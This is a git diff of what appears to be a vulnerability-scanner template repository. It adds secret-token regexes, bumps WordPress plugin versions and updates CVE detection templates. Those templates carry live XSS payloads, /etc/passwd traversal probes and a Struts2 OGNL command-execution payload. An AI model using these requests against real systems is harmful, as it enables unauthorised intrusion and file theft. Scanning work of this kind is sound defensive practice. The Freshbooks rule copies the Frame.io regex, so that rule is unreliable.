- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go
metadata:
verified: true
tags: frameio,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- fio-u-(?i)[a-z0-9\-_=]{64}

22
file/keys/freshbooks-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: freshbooks-access-token
info:
name: Freshbooks Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go
metadata:
verified: true
tags: freshbooks,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- fio-u-(?i)[a-z0-9\-_=]{64}

22
file/keys/gitter-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: gitter-access-token
info:
name: Gitter Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go
metadata:
verified: true
tags: gitter,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/gocardless-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: gocardless-api-token
info:
name: Gocardless API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go
metadata:
verified: true
tags: gocardless,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/grafana/grafana-api-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: grafana-api-key
info:
name: Grafana API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/grafana/grafana-cloud-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: grafana-cloud-api-token
info:
name: Grafana Cloud API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/grafana/grafana-service-account-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: grafana-service-account-token
info:
name: Grafana Service Account Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go
metadata:
verified: true
tags: grafana,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/hashicorp-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: hashicorp-api-token
info:
name: Hashicorp API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go
metadata:
verified: true
tags: hashicorp,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70}

22
file/keys/zendesk-secret-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: zendesk-secret-key
info:
name: Zendesk Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go
metadata:
verified: true
tags: zendesk,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)

2
helpers/wordpress/plugins/all-404-redirect-to-homepage.txt
View File

@ -1 +1 @@
4.2
4.3

2
helpers/wordpress/plugins/contact-form-cfdb7.txt
View File

@ -1 +1 @@
1.2.6.5
1.2.6.6

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
5.8.2
5.8.3

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.104.0
1.105.0

2
helpers/wordpress/plugins/host-webfonts-local.txt
View File

@ -1 +1 @@
5.6.0
5.6.1

2
helpers/wordpress/plugins/insert-headers-and-footers.txt
View File

@ -1 +1 @@
2.0.13
2.0.13.1

2
helpers/wordpress/plugins/loginizer.txt
View File

@ -1 +1 @@
1.7.9
1.8.0

2
helpers/wordpress/plugins/meta-box.txt
View File

@ -1 +1 @@
5.7.3
5.7.4

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.119
1.0.119.1

2
helpers/wordpress/plugins/so-widgets-bundle.txt
View File

@ -1 +1 @@
1.50.1
1.52.0

2
helpers/wordpress/plugins/woocommerce-paypal-payments.txt
View File

@ -1 +1 @@
2.1.0
2.2.0

2
helpers/wordpress/plugins/woocommerce-services.txt
View File

@ -1 +1 @@
2.3.0
2.3.1

2
helpers/wordpress/plugins/woocommerce.txt
View File

@ -1 +1 @@
7.8.2
7.9.0

2
helpers/wordpress/plugins/wordfence.txt
View File

@ -1 +1 @@
7.10.1
7.10.2

21
http/cves/2000/CVE-2000-0114.yaml
View File

@ -3,20 +3,25 @@ id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
severity: medium
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
- https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114
remediation: Upgrade to the latest version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2000-0114
cwe-id: NVD-CWE-Other
cvss-score: 5.0
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft,edb
epss-score: 0.09258
cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: internet_information_server
tags: cve,cve2000,frontpage,microsoft,edb
http:
- method: GET
@ -25,11 +30,11 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
- type: status
status:
- 200

11
http/cves/2001/CVE-2001-0537.yaml
View File

@ -3,22 +3,27 @@ id: CVE-2001-0537
info:
name: Cisco IOS HTTP Configuration - Authentication Bypass
author: DhiyaneshDK
severity: medium
severity: critical
description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
reference:
- https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
- http://www.ciac.org/ciac/bulletins/l-106.shtml
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
cvss-score: 9.3
cve-id: CVE-2001-0537
cwe-id: CWE-287
cvss-score: 5.0
epss-score: 0.89071
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: product:"Cisco IOS http config" && 200
vendor: cisco
product: ios
tags: cve,cve2001,cisco,ios,auth-bypass
http:

25
http/cves/2002/CVE-2002-1131.yaml
View File

@ -3,24 +3,26 @@ id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
author: dhiyaneshDk
severity: medium
severity: high
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference:
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
- https://www.exploit-db.com/exploits/21811
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2002-1131
tags: cve2002,edb,xss,squirrelmail,cve
cwe-id: CWE-80
epss-score: 0.06018
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 5
vendor: squirrelmail
product: squirrelmail
tags: cve2002,edb,xss,squirrelmail,cve
http:
- method: GET
@ -32,12 +34,9 @@ http:
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
@ -47,3 +46,7 @@ http:
part: header
words:
- "text/html"
- type: status
status:
- 200

18
http/cves/2004/CVE-2004-0519.yaml
View File

@ -8,16 +8,22 @@ info:
reference:
- https://www.exploit-db.com/exploits/24068
- http://security.gentoo.org/glsa/glsa-200405-16.xml
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
- http://marc.info/?l=bugtraq&m=108334862800260
remediation: Upgrade to the latest version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2004-0519
cwe-id: NVD-CWE-Other
tags: squirrelmail,cve2004,cve,edb,xss
epss-score: 0.02285
cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sgi
product: propack
tags: squirrelmail,cve2004,cve,edb,xss
http:
- method: GET
@ -26,10 +32,6 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
@ -39,3 +41,7 @@ http:
part: header
words:
- "text/html"
- type: status
status:
- 200

7
http/cves/2004/CVE-2004-1965.yaml
View File

@ -9,14 +9,19 @@ info:
reference:
- https://www.exploit-db.com/exploits/24055
- https://nvd.nist.gov/vuln/detail/CVE-2004-1965
- http://marc.info/?l=bugtraq&m=108301983206107&w=2
- https://exchange.xforce.ibmcloud.com/vulnerabilities/15966
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2004-1965
cwe-id: NVD-CWE-Other
epss-score: 0.0113
cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: openbb
product: openbb
tags: cve,cve2004,redirect,xss,openbb
http:

24
http/cves/2005/CVE-2005-2428.yaml
View File

@ -9,27 +9,35 @@ info:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
- http://marc.info/?l=bugtraq&m=112240869130356&w=2
- http://securitytracker.com/id?1014584
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2005-2428
cwe-id: CWE-200
tags: domino,edb,cve,cve2005
epss-score: 0.01188
cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ibm
product: lotus_domino
tags: domino,edb,cve,cve2005
http:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: regex
name: domino-username
part: body
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body

10
http/cves/2005/CVE-2005-3344.yaml
View File

@ -9,15 +9,20 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
- http://www.debian.org/security/2005/dsa-884
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
- http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24576
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2005-3344
cwe-id: NVD-CWE-Other
tags: cve,cve2005,horde,unauth
epss-score: 0.02158
cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: horde
product: horde
tags: cve,cve2005,horde,unauth
http:
- method: GET
@ -30,7 +35,6 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- "<title>Horde :: User Administration</title>"

9
http/cves/2005/CVE-2005-3634.yaml
View File

@ -14,14 +14,17 @@ info:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/23031
- https://nvd.nist.gov/vuln/detail/CVE-2005-3634
classification:
cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N)
cvss-score: 5.0
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N
cvss-score: 5
cve-id: CVE-2005-3634
cwe-id: NVD-CWE-Other
cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:*
epss-score: 0.02843
cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"SAP Business Server Pages Team"
vendor: sap
product: sap_web_application_server
tags: cve,cve2005,sap,redirect,business
http:

15
http/cves/2005/CVE-2005-4385.yaml
View File

@ -7,16 +7,20 @@ info:
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
- http://www.vupen.com/english/advisories/2005/2977
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2005-4385
cwe-id: NVD-CWE-Other
tags: cofax,xss,cve,cve2005
epss-score: 0.00294
cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cofax
product: cofax
tags: cofax,xss,cve,cve2005
http:
- method: GET
@ -25,10 +29,11 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
- type: status
status:
- 200

17
http/cves/2006/CVE-2006-1681.yaml
View File

@ -6,18 +6,22 @@ info:
severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
- http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25698
- https://security.gentoo.org/glsa/202012-09
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2006-1681
cwe-id: NVD-CWE-Other
tags: cherokee,httpd,xss,cve,cve2006
epss-score: 0.01015
cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cherokee
product: cherokee_httpd
tags: cherokee,httpd,xss,cve,cve2006
http:
- method: GET
@ -26,9 +30,6 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
@ -37,3 +38,7 @@ http:
part: header
words:
- text/html
- type: status
status:
- 200

13
http/cves/2006/CVE-2006-2842.yaml
View File

@ -9,16 +9,20 @@ info:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
- ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2006-2842
cwe-id: CWE-22
tags: cve,cve2006,lfi,squirrelmail,edb
epss-score: 0.2925
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: squirrelmail
product: squirrelmail
tags: cve,cve2006,lfi,squirrelmail,edb
http:
- method: GET
@ -27,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"

18
http/cves/2007/CVE-2007-0885.yaml
View File

@ -6,18 +6,20 @@ info:
severity: medium
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2007-0885
cwe-id: NVD-CWE-Other
cvss-score: 6.8
tags: cve,cve2007,jira,xss
epss-score: 0.00694
cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: rainbow_portal
product: rainbow.zen
tags: cve,cve2007,jira,xss
http:
- method: GET
@ -30,11 +32,11 @@ http:
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

13
http/cves/2007/CVE-2007-4504.yaml
View File

@ -3,20 +3,24 @@ id: CVE-2007-4504
info:
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2007-4504
cwe-id: CWE-22
tags: lfi,edb,cve,cve2007,joomla
epss-score: 0.01677
cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: rsfiles
tags: lfi,edb,cve,cve2007,joomla
http:
- method: GET
@ -25,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

18
http/cves/2007/CVE-2007-4556.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2007-4556
info:
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
author: pikpikcu
severity: critical
severity: medium
description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
@ -11,31 +11,37 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
- http://forums.opensymphony.com/ann.jspa?annID=54
- http://issues.apache.org/struts/browse/WW-2030
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2007-4556
cwe-id: NVD-CWE-Other
tags: cve,cve2007,apache,rce,struts
epss-score: 0.14147
cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: opensymphony
product: xwork
tags: cve,cve2007,apache,rce,struts
http:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
part: body
- type: status
status:

17
http/cves/2007/CVE-2007-5728.yaml
View File

@ -8,17 +8,21 @@ info:
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
- http://www.debian.org/security/2008/dsa-1693
- http://www.novell.com/linux/security/advisories/2007_24_sr.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2007-5728
cwe-id: CWE-79
epss-score: 0.03308
cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
vendor: phppgadmin
product: phppgadmin
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
http:
@ -28,16 +32,15 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

15
http/cves/2008/CVE-2008-1059.yaml
View File

@ -10,15 +10,20 @@ info:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
- http://securityreason.com/securityalert/3706
- https://exchange.xforce.ibmcloud.com/vulnerabilities/40829
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2008-1059
cwe-id: CWE-79
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
cwe-id: CWE-94
epss-score: 0.01493
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress
product: sniplets_plugin
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
http:
- method: GET

13
http/cves/2008/CVE-2008-1061.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2008-1061
info:
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: high
severity: medium
description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
@ -11,14 +11,19 @@ info:
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
- http://securityreason.com/securityalert/3706
- https://exchange.xforce.ibmcloud.com/vulnerabilities/40830
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-1061
cwe-id: CWE-79
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
epss-score: 0.00938
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress
product: sniplets_plugin
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
http:
- method: GET

8
http/cves/2008/CVE-2008-1547.yaml
View File

@ -9,16 +9,20 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2008-1547
- https://www.exploit-db.com/exploits/32489
- https://www.securityfocus.com/bid/31765/info
- http://securityreason.com/securityalert/4441
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46061
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-1547
cwe-id: CWE-601
epss-score: 0.03523
cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"Outlook"
vendor: microsoft
product: exchange_server
tags: cve,cve2008,redirect,owa,exchange,microsoft
http:

29
http/cves/2008/CVE-2008-2398.yaml
View File

@ -7,18 +7,20 @@ info:
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
- http://securityreason.com/securityalert/3896
